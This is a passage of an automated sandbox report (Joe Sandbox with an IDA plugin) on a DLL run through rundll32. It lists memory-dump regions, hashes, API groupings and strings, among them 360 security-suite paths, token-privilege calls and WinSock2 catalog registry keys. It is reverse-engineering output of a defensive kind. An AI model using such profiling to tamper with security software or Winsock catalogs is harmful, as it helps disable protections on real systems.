                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                  • Instruction ID: fdd3b53fd5ef90cd25e79b7e67ac9ef4d4291e3d36f58b03b6eae1744e84b5e2
                                                                  • Opcode Fuzzy Hash: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                  • Instruction Fuzzy Hash: 42C01262B0D6D049D7056B7420A469E2FB16762789B05405A4B4163E69C8388206C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
                                                                  • String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
                                                                  • API String ID: 1121195023-828389715
                                                                  • Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                  • Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
                                                                  • Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                  • Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
                                                                  • String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
                                                                  • API String ID: 4260417939-4002867936
                                                                  • Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                  • Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
                                                                  • Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                  • Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
                                                                  • String ID: 9
                                                                  • API String ID: 2469906296-2366072709
                                                                  • Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                  • Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
                                                                  • Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                  • Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
                                                                  • String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
                                                                  • API String ID: 3359005274-2277939915
                                                                  • Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                  • Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
                                                                  • Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                  • Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Token$CloseHandleInformationProcess$AdjustBlockCreateEnvironmentErrorLastPrivilegesUser$ActiveConsoleCurrentDestroyDuplicateLookupOpenPrivilegeQuerySessionValuememset
                                                                  • String ID: SeTcbPrivilege$h$winsta0\default
                                                                  • API String ID: 2730501308-2823425829
                                                                  • Opcode ID: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                  • Instruction ID: 63acb98c3057d7eee2a2f85741aa180b658631cb3bbab8e9928767d1695d7121
                                                                  • Opcode Fuzzy Hash: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                  • Instruction Fuzzy Hash: A4A11072608B8486E7A1CF65F8507DAB7E4F7CC794F518125EA8983B68DF38C649CB04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close$Open$Enumfree
                                                                  • String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
                                                                  • API String ID: 1285027818-2258373985
                                                                  • Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                  • Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
                                                                  • Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                  • Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
                                                                  • String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
                                                                  • API String ID: 3772276521-2728888700
                                                                  • Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                  • Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
                                                                  • Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                  • Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: free$calloc$memset
                                                                  • String ID: -$]$]
                                                                  • API String ID: 2591755499-1349866957
                                                                  • Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                  • Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
                                                                  • Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                  • Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Timefree$??3@System$FileMutexRelease
                                                                  • String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
                                                                  • API String ID: 2360919559-3261407791
                                                                  • Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                  • Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
                                                                  • Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                  • Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
                                                                  • String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
                                                                  • API String ID: 2413450229-732542554
                                                                  • Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                  • Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
                                                                  • Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                  • Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                  • lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$lstrcmpi$Value
                                                                  • String ID:
                                                                  • API String ID: 3520330261-0
                                                                  • Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                  • Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
                                                                  • Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                  • Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wtoi$Value$??3@memset
                                                                  • String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
                                                                  • API String ID: 1219333133-3184008533
                                                                  • Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                  • Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
                                                                  • Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                  • Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Version$AddressHandleModuleProcValueatoimemset
                                                                  • String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                  • API String ID: 1009632096-1820686997
                                                                  • Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                  • Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
                                                                  • Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                  • Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
                                                                  • String ID: 360util
                                                                  • API String ID: 2488163691-2294763832
                                                                  • Opcode ID: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                  • Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
                                                                  • Opcode Fuzzy Hash: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                  • Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
                                                                  • String ID:
                                                                  • API String ID: 2775880128-0
                                                                  • Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                  • Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
                                                                  • Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                  • Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
                                                                  • String ID:
                                                                  • API String ID: 2007143780-0
                                                                  • Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                  • Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
                                                                  • Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                  • Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
